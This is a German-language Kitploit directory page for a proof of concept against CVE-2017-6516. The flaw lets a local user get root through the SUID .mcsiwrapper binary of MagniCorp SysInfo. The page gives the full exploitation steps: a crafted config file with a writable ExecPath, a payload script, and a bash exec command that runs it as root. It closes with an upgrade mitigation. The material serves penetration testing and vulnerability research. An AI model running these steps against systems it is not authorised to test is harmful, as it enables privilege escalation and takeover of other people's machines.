Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-6516-mcsiwrapper- — Ein PoC / eine Methodik zum Ausnutzen von CVE-2017-6516 | Kitploit
Tools/GitHubGitHub/rubytox/cve-2017-6516-mcsiwrapper-
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsBinary-Exploitation
GitHubrubytox/cve-2017-6516-mcsiwrapper-

CVE-2017-6516-mcsiwrapper-

Ein PoC / eine Methodik zum Ausnutzen von CVE-2017-6516

Repository anzeigen
2vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-6516

CVE-2017-6516 ist eine Privilegienausweitungsschwachstelle, die auf die Binärdatei .mcsiwrapper von MagniCorp SysInfo unter Version 10-H64 abzielt. Wenn diese Binärdatei das SUID-Bit gesetzt hat und veraltet ist, kann ein Benutzer beliebigen Code als Besitzer der Binärdatei ausführen – was oft root ist.

Voraussetzungen

  • Die Binärdatei .mcsiwrapper muss das SUID-Bit gesetzt haben:
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
  • Die Binärdatei .mcsiwrapper muss eine Version unter 10-H64 sein:
$ .mcsiwrapper --version
<Version under 10-H64>

Ausnutzung

Erstellen Sie eine Datei config mit folgendem Inhalt:

ExecPath=<Path to a writeable directory>

Erstellen Sie eine ausführbare Payload-Datei im ExecPath-Verzeichnis, zum Beispiel:

#!/bin/sh
whoami

Und machen Sie sie ausführbar:

$ chmod +x payload

Führen Sie den Befehl aus:

$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root

Gegenmaßnahmen

Aktualisieren Sie .mcsiwrapper auf mindestens 10-H64.

Tool herunterladen